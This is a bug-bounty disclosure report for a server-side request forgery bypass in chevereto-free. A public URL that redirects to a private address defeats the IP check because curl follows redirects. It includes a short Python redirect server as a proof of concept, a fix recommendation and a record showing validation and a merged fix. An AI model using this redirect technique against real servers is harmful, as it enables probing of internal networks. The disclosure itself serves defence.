Server-Side Request Forgery (SSRF) in rodber/chevereto-free


Reported on

Dec 30th 2021


There was some hardening done previously against private IP addresses in the SSRF vulnerability I disclosed in the previous report However the checks can be bypassed by URL redirection.

Proof of Concept

If resolves to a Public IP address, it will pass the isValidUrl check, if this same redirects to a private IP address, by serving a 302 Response, when passed to curl_exec, it will cause curl_exec to query the private address instead because in CURLOPT_SETLOCATION is set to 1, which tells curl to follow redirects.

A redirector for testing can be set up like this

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2:
    print("Usage: {} <port_number> <url>".format(sys.argv[0]))

class Redirect(BaseHTTPRequestHandler):
   def do_GET(self):
       self.send_header('Location', sys.argv[2])

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
python [port] [redirect_url]


This vulnerability is capable of SSRF (server makes requests to the internal network)



Redirection should be disabled for file_get_contents too

We are processing your report and will contact the rodber/chevereto-free team within 24 hours. a month ago
haxatron modified their report
a month ago
haxatron submitted a
a month ago
We have contacted a member of the rodber/chevereto-free team and are waiting to hear back a month ago
We have sent a follow up to the rodber/chevereto-free team. We will try again in 7 days. 25 days ago
Rodolfo Berrios validated this vulnerability 21 days ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Rodolfo Berrios confirmed that a fix has been merged on 586031 21 days ago
haxatron has been awarded the fix bounty
functions.php#L1651 has been validated
functions.php#L1691L1693 has been validated